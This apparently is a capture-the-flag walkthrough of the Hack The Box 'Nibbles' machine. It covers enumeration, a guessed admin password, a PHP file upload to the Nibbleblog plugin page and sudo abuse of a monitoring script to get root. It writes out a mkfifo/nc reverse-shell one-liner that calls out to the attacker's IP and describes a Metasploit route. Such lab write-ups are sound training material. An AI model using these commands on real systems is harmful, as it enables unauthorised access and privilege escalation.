9 min read1 day ago

–

Port Scanning

For this box, we know it’s a Linux box and it has a web server of some kind. Let’s perform some emumeration and start off with an nmap scan.

Run the command nmap -sV --open -oA nibbles_initial_scan <target_ip> this will perform a full version scan on the target, only returning output for open ports and will output everything to the initial scan file.

the .nmap file is the same as stndout and the other two are formatted for potential other operations

As a side note, the -p- flag for nmap will scan ALL ports, helpful for finding more hidden services.

Next, as a good pratice to verify the nmap scans we can perform some banner grabbing with the command nc -nv <target_ip> <target_port>

Now after verifying that only ports 22 and 80 are open, we can utilize some nmap scripts to try and acquire some more information. We can use the default scripts by running nmap -sC -p 22,80 -oA script_scan <target_ip> . The -p flag just specifies the ports to save time as we dont need to hit every port with the scripts. Now point and fire.

We can also hit it with a http specific script to see if we get anything. Let’s try nmap -sV --script=http-enum -oA http_enum_scan <target_ip>. This http-enum script will try to find any standard or common directory paths for the web server.

Web Enumeration

The whatweb <target_ip> command can be useful for identifying web app technology.

Additionally, looking at the html source or just curling the webpage we can see there’s an html comment that references a /nibbleblog/ directory. We can whatweb that as well or navigate to the page.

Running whatweb on the /nibbleblog directory reveals that shockingly, it is running a app called nibbleblog. Using the power of search engines we can see that there is a Nibbleblog file upload exploit and its built into Metasploit, wow 2 ez. However, we do not yet know the version of Nibbleblog this page is running so let’s do some more recon.

Using gobuster, we can try to enumerate any other file paths on the web server. gobuster dir -u http://<target_address>/<file_path> --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt. Bit of a mouthful, but that will attempt to enumerate any common file paths on the web server.

Our gobuster scan reveals that there is an exposed admin web page and a README file. Either going to the README in the browser or curl ing it will reveal some information about the app, most importantly for us though, the version number. Confirming our suspicion as 4.0.3 is the version vulnerable to our metasploit module.

Before we go down the rabbithole of trying to get that module working, maybe there’s an easier option. Let’s continue to do some enumeration and visit each of the web pages gobuster gave us results for.

After digging around the available directories we find that under /content/private there is a users.xml file. There aren’t any passwords, but we do see that admin is a valid user. In this same directory, there is a config.xml file and while it doesn’t have any passwords and doing a google search reveals no default passwords, we see the reoccuring theme of nibbles throughout the site. Could nibbles be the admin password?

Nibbles being the password really just goes to show not only the importance of enumeration, but also pattern recognition and trying all likely options.

Alright, after gaining access to the admin login page we need to find a way to turn our web portal access into a shell. We do have that Metasploit module, but let’s only use that as a fall back. Let’s explore the admin portal and see what we can find.

After perusing all the different options we come across this plugin page.

Press enter or click to view image in full size

Now we also know that this is a php page and that sometimes php can be vulnerable to file upload vulnerabilities. We see this Images plugin and maybe it’s possible that allows us to upload files?

Press enter or click to view image in full size

Perfect. Alright, so now here’s the deal. We’re gonna put this ````php code

into a file and we’re gonna upload it to the server and see what happens.

Press enter or click to view image in full size

Okay, file is ready to go

Press enter or click to view image in full size

Okay, after uploading the file we do seem to get a lot of errors, but it didn’t say that it didn’t upload. Maybe we can check if it uploaded by going back to that /content directory and seeing what’s in there now.

Alright so we’re here in the content directory, let’s just go through these and see what we find. Starting with private.

Is that a plugins directory I see? Could it be?

Press enter or click to view image in full size

Truly?

Press enter or click to view image in full size

Now at first it may seem hope is lost, but maybe there’s a chance the server renames files? I mean, it’s always important to double check. image.php

Awesome. We know what to do, let’s set up a nc listener on our host machine. Oh and also there’s this nifty php one line to get our reverse shell.

my ip is 10.10.14.38 and I’ll use port 7777

Press enter or click to view image in full size

Very nice, let’s start our nc listener and then fire this bad boi off

Press enter or click to view image in full size

Oh important note, either curl the file you just uploaded or visit the file via your browser, I’ll do the browser method

Press enter or click to view image in full size

You’re damn right I’m the nibbler

Alright we have our shell, but’s it’s not pretty and makes me feel dirty. Like I hacked into this system or something. Here’s a python one liner to make our shell prettier

Press enter or click to view image in full size

Alright, another quick note I wanted to make. At first it’s like oh no python isn’t installed, but no python3 is, just not 2. This is verified with both the which and whereis commands. So to get our shell (but pretty) just add the 3

Press enter or click to view image in full size

Very nice. Let’s go plunder this users home directory cause why not

Press enter or click to view image in full size

in nibblers home folder we see a personal zip file and a user.txt file which has our flag in there

Privilege Escalation

Alright, the moment that separates the boys from the men. Time to gain root (or just you know, more system access). Before we start digging around for potential exploitable binaries or misconfigs in the sudoers file, let’s unzip this personal.zip file.

Here we see some definitely personal things, but also a monitoring script?

Press enter or click to view image in full size

Press enter or click to view image in full size

Hmmm, well it is in fact a system health monitoring script owned by our user here. Could be useful, let’s explore some other avenues.

Alright, we’re going to pull LinEnum.sh onto our server here to do some priv esc checks. Let’s first make sure we have said script and then host a python server so we can wget the script over to us.

Press enter or click to view image in full size

Script acquired

Press enter or click to view image in full size

And server hosting, let’s grab our script

Press enter or click to view image in full size

Very very nice. Let’s make it executable and then run it

Press enter or click to view image in full size

Alright, give that a second to run and then we’ll scan through the output and see what we might have

Press enter or click to view image in full size

So it does look like we can execute that monitoring script with sudo privileges. Well perfect, what we can do is add a reverse shell one liner to the end of that file then and run it.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.38 8888 >/tmp/f' | tee -a monitor.sh

IMPORTANT note from HTB. During pentests, it is important to make backups of these files before modifying them as we don’t want to disrupt the business’s operations.

Okay, let’s start the root reverse shell in a new shell and then append our rev shell to the file

Press enter or click to view image in full size

Lol you can see me struggling to get it to fire correctly for a second. But yeah no after appending that line to the end of our users monitor.sh file we get a root shell on our other nc listener.

Annnndddddd roooottteedddd.

As mentioned earlier, there is an alternative pathway here where we use the Metasploit module in order to achieve the same goal. Metasploit is a great back up option for when we need it, but should not really be our go to as it doesn’t teach us very much and the whole point of doing these boxes is to learn new tools and techniques.

Press enter or click to view image in full size

As you can see here from searchsploit though, yes we do have a module for Nibbleblog v 4.0.3. So let’s fire up Metasploit and try out this module.

Press enter or click to view image in full size

Here we search for the nibbleblog exploit again, find it and load it by just typing use 0.

Press enter or click to view image in full size

show options shows us all of the different setting that can be set for this module. For some exploit there are required settings, indicated by the yes under the Required section. So we need to set the PASSWORD, RHOSTS, TARGETURI, USERNAME and LHOST options so let’s do all that.

Press enter or click to view image in full size

Doing show options again after all of that should reflect the correct settings for each field

Press enter or click to view image in full size

We also need to change the payload to generic/shell_reverse_tcp which, as it says, it just a generic reverse shell. After running set payload generic/shell_reverse_tcp we can go ahead and exploit

Press enter or click to view image in full size

From this point we can do the same privilege escalation steps in order to root the box

Press enter or click to view image in full size